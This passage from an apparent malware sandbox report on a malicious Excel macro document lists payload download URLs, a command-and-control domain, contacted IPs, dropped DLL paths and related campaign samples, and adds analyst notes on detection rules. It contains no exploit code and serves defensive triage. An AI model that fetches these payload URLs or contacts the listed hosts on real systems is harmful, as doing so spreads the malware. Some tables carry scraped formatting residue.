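    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The extension-mismatch and user-root rules are the durable ones: the three download domains rotate between campaigns, while a PE written under a .fml or .jpg name by an Office process, and regsvr32.exe loading a DLL from the top of a user profile, are the behaviours the report's "Drops files with a non-matching file extension" and "Drops PE files to the user root directory" signatures fire on.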

        Screenshots


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation (3 identical entries) | safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom | 0% | URL Reputation (3 identical entries) | safe
https://www.buzzsprout.com; | 0% | Avira URL Cloud | safe
http://astrocycle.download/ | 0% | Avira URL Cloud | safe
http://ocsp.sca1b.amazontrust.com0 | 0% | URL Reputation (3 identical entries) | safe
http://ocsp.sca1b.amazontrust.com06 | 0% | URL Reputation (3 identical entries) | safe
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | URL Reputation (3 identical entries) | safe
http://uppercilio.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submit | 0% | Avira URL Cloud | safe
http://thousandsyears.download/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
https://amazonwebservices.d2.sc.omtrdc.net | 0% | Avira URL Cloud | safe
http://ocsp.sca1b.amazontrust.comca1b.crt0 | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation (3 identical entries) | safe
https://112-tzm-766.mktoutil.com | 0% | Avira URL Cloud | safe
http://crl.roo | 0% | Avira URL Cloud | safe
https://download.stormacq.com/aws/podcast/ | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation (3 identical entries) | safe
astrocycle.download | 0% | Avira URL Cloud | safe
https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1MEGKE28WTTVJKEVVHZSJX-Content-Ty | 0% | Avira URL Cloud | safe
https://chtbl.com | 0% | Avira URL Cloud | safe

Note that the payload URLs on uppercilio.fun and thousandsyears.download, and the C2 domain astrocycle.download, all scored 0% / "safe" with the URL scanners at analysis time; the verdict for this sample comes from behaviour and the extracted configuration, not from URL reputation. Trailing characters such as "0", "06" and "0:" on the CRL and OCSP entries are residue of the DER-encoded certificate strings the URLs were carved from.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
uppercilio.fun | 172.67.146.88 | true | false | none | unknown
thousandsyears.download | 172.67.198.51 | true | false | none | unknown
voopeople.fun | 172.67.194.117 | true | false | none | unknown
astrocycle.download | 104.21.37.209 | true | true | none | unknown
dr49lng3n1n2s.cloudfront.net | 143.204.91.74 | true | false | none | high
aws.amazon.com | unknown | unknown | false | none | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://astrocycle.download/ | true | Avira URL Cloud: safe | unknown
http://uppercilio.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
http://thousandsyears.download/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
astrocycle.download | true | Avira URL Cloud: safe | unknown

Only astrocycle.download is marked malicious; it is the domain contacted by regsvr32.exe after the DLL is loaded (see the Behavior Graph) and is the one to treat as C2 when building blocklists. The three download domains are marked not malicious even though they served the PE32+ payload disguised as a .jpg, so do not rely on the Malicious column alone when extracting indicators from this table.

URLs from Memory and Binaries

All entries below were carved from memory dumps of regsvr32.exe (process index 00000004). Dump sources are abbreviated as follows:

[A] regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmp
[B] regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp
[C] regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp
[D] regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmp
[E] regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmp
[F] regsvr32.exe, 00000004.00000002.2089851397.0000000002CC0000.00000002.00000001.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.linkedin.com | [A] | false | none | high
https://a0.awsstatic.com/libra/1.0.385/directories | [B] | false | none | high
https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif | [B] | false | none | high
https://c0.b0.p.awsstatic.com | [A] | false | none | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | [C] | false | URL Reputation: safe (3 identical entries) | unknown
https://api.regional-table.region-services.aws.a2z.com | [A] | false | none | high
https://a0.awsstatic.com/libra/1.0.385/librastandardlib | [B] | false | none | high
https://aws.amazon.com/ar/ | [B] | false | none | high
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom | [B] | false | URL Reputation: safe (3 identical entries) | unknown
https://a0.p.awsstatic.com | [A] | false | none | high
https://aws.amazon.com/cn/?nc1=h_ls | [B] | false | none | high
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default | [B] | false | none | high
https://aws.amazon.com/ru/ | [B] | false | none | high
https://www.buzzsprout.com; | [A] | false | Avira URL Cloud: safe | low
https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser | [B] | false | none | high
https://i18n-string.us-west-2.prod.pricing.aws.a2z.com | [A] | false | none | high
https://aws.amazon.com/ru/?nc1=h_ls | [B] | false | none | high
https://docs.aws.amazon.com/index.html?nc2=h_ql_doc | [B] | false | none | high
https://aws.amazon.com/ar/?nc1=h_ls | [B] | false | none | high
https://p.adsymptotic.com | [A] | false | none | high
http://ocsp.sca1b.amazontrust.com | [C] | false | URL Reputation: safe (3 identical entries) | unknown
https://aws.amazon.com/th/ | [B] | false | none | high
https://docs.aws.amazon.com | [A] | false | none | high
http://www.windows.com/pctv. | [E] | false | none | high
https://aws.amazon.com/marketplace/?nc2=h_mo | [B] | false | none | high
https://d2a6igt6jhaluh.cloudfront.net | [A] | false | none | high
http://ocsp.sca1b.amazontrust.com06 | [D] | false | URL Reputation: safe (3 identical entries) | unknown
https://console.aws.amazon.com/support/home/?nc2=h_ql_cu | [B] | false | none | high
https://dftu77xade0tc.cloudfront.net | [A] | false | none | high
https://aws.amazon.com/search/ | [B] | false | none | high
https://aws.amazon.com/?nc2=h_lg | [B] | false | none | high
http://ocsp.rootca1.amazontrust.com0: | [D] | false | Avira URL Cloud: safe | unknown
https://console.aws.amazon.com/support/home/?nc1=f_dr | [B] | false | none | high
https://aws.amazon.com/vi/ | [B] | false | none | high
http://crl.rootg2.amazontrust.com/rootg2.crl0 | [D] | false | URL Reputation: safe (3 identical entries) | unknown
https://aws.amazon.com/tw/ | [B] | false | none | high
https://aws.amazon.com/tr/?nc1=h_ls | [B] | false | none | high
https://aws.amazon.com/fr/?nc1=h_ls | [B] | false | none | high
https://d1fgizr415o1r6.cloudfront.net | [A] | false | none | high
https://a0.awsstatic.com/libra-search/1.0.13/js | [B] | false | none | high
https://prod-us-west-2.csp-report.marketing.aws.dev/submit | [A] | false | Avira URL Cloud: safe | unknown
https://f0.awsstatic.com | [A] | false | none | high
http://crl.entrust.net/2048ca.crl0 | [C] | false | none | high
https://spot-bid-advisor.s3.amazonaws.com | [A] | false | none | high
https://aws.amazon.com/ | [B], [C] | false | none | high
https://d3ctxlq1ktw2nl.cloudfront.net | [A] | false | none | high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png | [B] | false | none | high
https://amazonwebservices.d2.sc.omtrdc.net | [A] | false | Avira URL Cloud: safe | unknown
https://aws.amazon.com/podcasts/aws-podcast/ | [B] | false | none | high
https://d1yyh5dhdgifnx.cloudfront.net | [A] | false | none | high
https://aws.amazon.com/jp/ | [B] | false | none | high
https://d1hemuljm71t2j.cloudfront.net | [A] | false | none | high
http://ocsp.sca1b.amazontrust.comca1b.crt0 | [C] | false | Avira URL Cloud: safe | unknown
https://a0.awsstatic.com/libra-css/css/1.0.382 | [B] | false | none | high
https://view-stage.us-west-2.prod.pricing.aws.a2z.com | [A] | false | none | high
https://s3.amazonaws.com/public-pricing-agc/ | [A] | false | none | high
https://aws.amazon.com/de/ | [B] | false | none | high
http://investor.msn.com/ | [E] | false | none | high
https://phd.aws.amazon.com/?nc2=h_m_sc | [B] | false | none | high
https://a0.awsstatic.com/libra/1.0.385/libra-cardsui | [B] | false | none | high
https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png | [B] | false | none | high
http://www.%s.comPA | [F] | false | URL Reputation: safe (3 identical entries) | low
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default | [B] | false | none | high
https://a0.awsstatic.com | [A] | false | none | high
https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico | [B] | false | none | high
https://ssl-static.libsyn.com | [A] | false | none | high
https://website.spot.ec2.aws.a2z.com | [A] | false | none | high
https://112-tzm-766.mktoutil.com | [A] | false | Avira URL Cloud: safe | unknown
https://static.doubleclick.net | [A] | false | none | high
https://aws.amazon.com/th/?nc1=f_ls | [B] | false | none | high
http://investor.msn.com | [E] | false | none | high
http://crl.roo | [C] | false | Avira URL Cloud: safe | unknown
https://aws.amazon.com/tr/ | [B] | false | none | high
https://a0.awsstatic.com/g11n-lib/2.0.76 | [B] | false | none | high
https://s0.awsstatic.com | [A] | false | none | high
https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6 | [B] | false | none | high
https://www.amazon.jobs/aws | [B] | false | none | high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png | [B] | false | none | high
https://googleads.g.doubleclick.net | [A] | false | none | high

None of the entries above is marked malicious. The aws.amazon.com, awsstatic.com, cloudfront.net, linkedin.com and doubleclick.net strings in dumps [A] and [B] are web-page content consistent with the regsvr32.exe process's connection to aws.amazon.com listed under Contacted Domains; the report rates them high reputation, and they should not be added to indicator lists. The Amazon Trust, Entrust and PKIoverheid CRL/OCSP strings in [C] and [D] are certificate-chain residue from the TLS connections. The only domain this report marks malicious remains astrocycle.download.
                                                                                                                                                        https://s3.amazonaws.com/aws-messaging-pricing-information/regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://download.stormacq.com/aws/podcast/regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.jsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://console.aws.amazon.com/support/home?nc2=h_ql_curegsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svgregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://d2908q01vomqb2.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://dgen8gghn3u86.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://pages.awscloud.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1MEGKE28WTTVJKEVVHZSJX-Content-Tyregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://aws.amazon.com/vi/?nc1=f_lsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://a0.awsstatic.com/aws-blog/1.0.47/jsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://chtbl.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://dk261l6wntthl.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.cssregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://console.aws.amazon.com/billing/home?nc2=h_m_bcregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high

                                                                                                                                                                                  Contacted IPs


                                                                                                                                                                                  Public

IP | Domain | Country | ASN | ASN name | Malicious
172.67.198.51 | thousandsyears.download | United States | 13335 | CLOUDFLARENET (US) | false
143.204.91.74 | dr49lng3n1n2s.cloudfront.net | United States | 16509 | AMAZON-02 (US) | false
104.21.37.209 | astrocycle.download | United States | 13335 | CLOUDFLARENET (US) | true
172.67.146.88 | uppercilio.fun | United States | 13335 | CLOUDFLARENET (US) | false
172.67.194.117 | voopeople.fun | United States | 13335 | CLOUDFLARENET (US) | false

                                                                                                                                                                                  General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 444731
Start date: 06.07.2021
Start time: 16:02:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 45s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Vac.list07-20214862208.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@7/4@7/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 70.6% (good quality ratio 56.6%)
• Quality average: 70.2%
• Quality standard deviation: 40%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 12
• Number of non-executed functions: 3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                  Simulations

                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                  No simulations

                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                  IPs

Match | Associated sample name / URL | Detection | Context
172.67.198.51 | List-4527768.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | HRcontacts7752205.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | sbf0127365-7431059.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Outfordelivery799862.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | Purchaseconfirmation-137606.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | DeliveryConf535215.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
172.67.198.51 | PI-210610.xlsm | malicious | thousandsyears.download/div/44376,8555986111.jpg
143.204.91.74 | f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll | malicious |
143.204.91.74 | 8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dll | malicious |
143.204.91.74 | 718421.xlsm | malicious |
143.204.91.74 | paxi1.dll | malicious |
143.204.91.74 | 7hu4M2hAe7.dll | malicious |
143.204.91.74 | lQsa52UcOF.xlsb | malicious |
143.204.91.74 | b8c033482291a3c073483fc23df165d39fd79c6f22144.dll | malicious |
143.204.91.74 | jLyCpYVr6p.dll | malicious |
143.204.91.74 | E7D5105D3408A45C1003172B9A1AA3A1E60F7AC6E07E8.dll | malicious |
143.204.91.74 | BA6D707A66005C28EA843C2F7623AF7B7B09B1C02FCF0.dll | malicious |
143.204.91.74 | 3AC49BC78F8FCB40EEA7016B3319401AF6CF19149586E.dll | malicious |
104.21.37.209 | HRcontacts7752205.xlsm | malicious | astrocycle.download/
104.21.37.209 | Formtofill4184860.xlsm | malicious | astrocycle.download/
104.21.37.209 | Outfordelivery799862.xlsm | malicious | astrocycle.download/
104.21.37.209 | Purchaseconfirmation-137606.xlsm | malicious |
                                                                                                                                                                                                        • astrocycle.download/
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • astrocycle.download/
                                                                                                                                                                                                        172.67.146.88List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg

Domains

Match | Associated Sample Name / URL | Detection | Context
voopeople.fun | List-4527768.xlsm | malicious | 172.67.194.117
voopeople.fun | HRcontacts7752205.xlsm | malicious | 172.67.194.117
voopeople.fun | Formtofill4184860.xlsm | malicious | 172.67.194.117
voopeople.fun | sbf0127365-7431059.xlsm | malicious | 104.21.12.122
voopeople.fun | Outfordelivery799862.xlsm | malicious | 172.67.194.117
voopeople.fun | Purchaseconfirmation-137606.xlsm | malicious | 172.67.194.117
voopeople.fun | DeliveryConf535215.xlsm | malicious | 172.67.194.117
voopeople.fun | PI-210610.xlsm | malicious | 172.67.194.117
thousandsyears.download | List-4527768.xlsm | malicious | 172.67.198.51
thousandsyears.download | HRcontacts7752205.xlsm | malicious | 172.67.198.51
thousandsyears.download | Formtofill4184860.xlsm | malicious | 104.21.52.111
thousandsyears.download | sbf0127365-7431059.xlsm | malicious | 172.67.198.51
thousandsyears.download | Outfordelivery799862.xlsm | malicious | 172.67.198.51
thousandsyears.download | Purchaseconfirmation-137606.xlsm | malicious | 172.67.198.51
thousandsyears.download | DeliveryConf535215.xlsm | malicious | 172.67.198.51
thousandsyears.download | PI-210610.xlsm | malicious | 172.67.198.51
dr49lng3n1n2s.cloudfront.net | List-4527768.xlsm | malicious | 13.225.75.73
dr49lng3n1n2s.cloudfront.net | HRcontacts7752205.xlsm | malicious | 13.225.75.73
dr49lng3n1n2s.cloudfront.net | Formtofill4184860.xlsm | malicious | 13.225.75.73
dr49lng3n1n2s.cloudfront.net | sbf0127365-7431059.xlsm | malicious | 13.224.92.73
dr49lng3n1n2s.cloudfront.net | Outfordelivery799862.xlsm | malicious | 13.224.92.73
dr49lng3n1n2s.cloudfront.net | Purchaseconfirmation-137606.xlsm | malicious | 13.224.92.73
dr49lng3n1n2s.cloudfront.net | DeliveryConf535215.xlsm | malicious | 13.224.92.73
dr49lng3n1n2s.cloudfront.net | PI-210610.xlsm | malicious | 143.204.4.74
dr49lng3n1n2s.cloudfront.net | f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll | malicious | 143.204.91.74
dr49lng3n1n2s.cloudfront.net | 8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dll | malicious | 143.204.91.74
dr49lng3n1n2s.cloudfront.net | 718421.xlsm | malicious | 143.204.91.74
dr49lng3n1n2s.cloudfront.net | Ln11IgJVUM.dll | malicious | 13.225.75.73
dr49lng3n1n2s.cloudfront.net | 6c710694d270db91b550daf3177622514d2444e7484fb.dll | malicious | 13.225.75.73
dr49lng3n1n2s.cloudfront.net | SOAOG31JdG.dll | malicious | 13.225.75.73
dr49lng3n1n2s.cloudfront.net | QEiuTX6cTw.dll | malicious | 143.204.91.74
dr49lng3n1n2s.cloudfront.net | YiIS9HvO21.dll | malicious | 13.32.16.68
dr49lng3n1n2s.cloudfront.net | xDxD5fLpPC.dll | malicious | 52.222.157.68
dr49lng3n1n2s.cloudfront.net | YiIS9HvO21.dll | malicious | 52.222.157.68
dr49lng3n1n2s.cloudfront.net | AQvfg6cfsH.dll | malicious | 52.222.157.68
dr49lng3n1n2s.cloudfront.net | 1hIvIzTHG5.dll | malicious | 52.222.157.68
uppercilio.fun | List-4527768.xlsm | malicious | 172.67.146.88
uppercilio.fun | HRcontacts7752205.xlsm | malicious | 104.21.55.83
uppercilio.fun | Formtofill4184860.xlsm | malicious | 172.67.146.88
uppercilio.fun | sbf0127365-7431059.xlsm | malicious | 104.21.55.83
uppercilio.fun | Outfordelivery799862.xlsm | malicious | 104.21.55.83
uppercilio.fun | Purchaseconfirmation-137606.xlsm | malicious | 104.21.55.83
uppercilio.fun | DeliveryConf535215.xlsm | malicious | 104.21.55.83
uppercilio.fun | PI-210610.xlsm | malicious | 104.21.55.83
astrocycle.download | List-4527768.xlsm | malicious | 172.67.213.115
astrocycle.download | HRcontacts7752205.xlsm | malicious | 172.67.213.115
astrocycle.download | Formtofill4184860.xlsm | malicious | 104.21.37.209
astrocycle.download | sbf0127365-7431059.xlsm | malicious | 172.67.213.115
astrocycle.download | Outfordelivery799862.xlsm | malicious | 104.21.37.209
astrocycle.download | Purchaseconfirmation-137606.xlsm | malicious | 172.67.213.115
astrocycle.download | DeliveryConf535215.xlsm | malicious | 172.67.213.115
astrocycle.download | PI-210610.xlsm | malicious | 172.67.213.115

ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | List-4527768.xlsm | malicious | 172.67.194.117
CLOUDFLARENETUS | HRcontacts7752205.xlsm | malicious | 172.67.194.117
CLOUDFLARENETUS | Formtofill4184860.xlsm | malicious | 172.67.194.117
CLOUDFLARENETUS | sbf0127365-7431059.xlsm | malicious | 104.21.12.122
CLOUDFLARENETUS | runsys32.dll | malicious | 104.20.185.68
CLOUDFLARENETUS | Outfordelivery799862.xlsm | malicious | 172.67.194.117
CLOUDFLARENETUS | Purchaseconfirmation-137606.xlsm | malicious | 172.67.194.117
CLOUDFLARENETUS | DeliveryConf535215.xlsm | malicious | 172.67.194.117
CLOUDFLARENETUS | SMR8OzIgNB.exe | malicious | 104.21.8.151
CLOUDFLARENETUS | Follow up Purchase order num- 4500262450.exe | malicious | 104.21.75.42
CLOUDFLARENETUS | PI-210610.xlsm | malicious | 172.67.194.117
                                                                                                                                                                                                        2790000.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.20.185.68
                                                                                                                                                                                                        2770174.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.20.185.68
                                                                                                                                                                                                        Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 172.67.188.154
                                                                                                                                                                                                        rial exe.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.19.200
                                                                                                                                                                                                        Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.21.19.200
                                                                                                                                                                                                        SCTc9qaix4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 1.0.0.1
                                                                                                                                                                                                        AFS Co., Ltd..exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.26.6.41
                                                                                                                                                                                                        q7p7x4f4gX.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.20.184.68
                                                                                                                                                                                                        XoN2GgRiga.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 104.23.99.190
                                                                                                                                                                                                        AMAZON-02USList-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        Reciept 19129475.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                        • 54.191.98.150
                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.4.74
                                                                                                                                                                                                        GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msiGet hashmaliciousBrowse
                                                                                                                                                                                                        • 18.231.168.212
                                                                                                                                                                                                        39d0c1e7.msiGet hashmaliciousBrowse
                                                                                                                                                                                                        • 3.143.159.48
                                                                                                                                                                                                        Movcy_v1.0.0.apkGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.39.180.2
                                                                                                                                                                                                        order No. 00192099##001 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 3.143.65.214
                                                                                                                                                                                                        f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                                        lZYIQJNUsZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 13.249.12.162
                                                                                                                                                                                                        q62NZgHtRq.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 3.22.53.161
                                                                                                                                                                                                        iGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.9.197.152
                                                                                                                                                                                                        8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.217.140.209
                                                                                                                                                                                                        Request For Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 75.2.26.18
                                                                                                                                                                                                        pip install.yp.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        • 52.18.63.80

JA3 Fingerprints

Associated Sample Name / URL | Detection | Context

Match: 05af1f5ca1b87cc9cc9b25185115607d
  List-4527768.xlsm | malicious | 143.204.91.74
  HRcontacts7752205.xlsm | malicious | 143.204.91.74
  Formtofill4184860.xlsm | malicious | 143.204.91.74
  sbf0127365-7431059.xlsm | malicious | 143.204.91.74
  Outfordelivery799862.xlsm | malicious | 143.204.91.74
  Purchaseconfirmation-137606.xlsm | malicious | 143.204.91.74
  DeliveryConf535215.xlsm | malicious | 143.204.91.74
  PI-210610.xlsm | malicious | 143.204.91.74
  108020075.exe | malicious | 143.204.91.74
  G-DECL G50 EURL.xlsx | malicious | 143.204.91.74
  1.doc | malicious | 143.204.91.74
  DECL G50 EURL!.xlsx | malicious | 143.204.91.74
  Order No. 211128.doc | malicious | 143.204.91.74
  SOA.xlsx | malicious | 143.204.91.74
  DECL G50 EURL.xlsx | malicious | 143.204.91.74
  WO 378871.xlsb | malicious | 143.204.91.74
  Order 824126.xlsb | malicious | 143.204.91.74
  WO 378871.xlsb | malicious | 143.204.91.74
  PO 31449213.xlsb | malicious | 143.204.91.74
  Order 161488.xlsb | malicious | 143.204.91.74

Dropped Files

Associated Sample Name / URL | Detection

Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
  List-4527768.xlsm | malicious
  HRcontacts7752205.xlsm | malicious
  Formtofill4184860.xlsm | malicious
  sbf0127365-7431059.xlsm | malicious
  Outfordelivery799862.xlsm | malicious
  Purchaseconfirmation-137606.xlsm | malicious
  DeliveryConf535215.xlsm | malicious
  PI-210610.xlsm | malicious

Match: C:\Users\user\XTOWN.dll
  List-4527768.xlsm | malicious
  HRcontacts7752205.xlsm | malicious
  Formtofill4184860.xlsm | malicious
  sbf0127365-7431059.xlsm | malicious
  Outfordelivery799862.xlsm | malicious
  Purchaseconfirmation-137606.xlsm | malicious
  DeliveryConf535215.xlsm | malicious
  PI-210610.xlsm | malicious
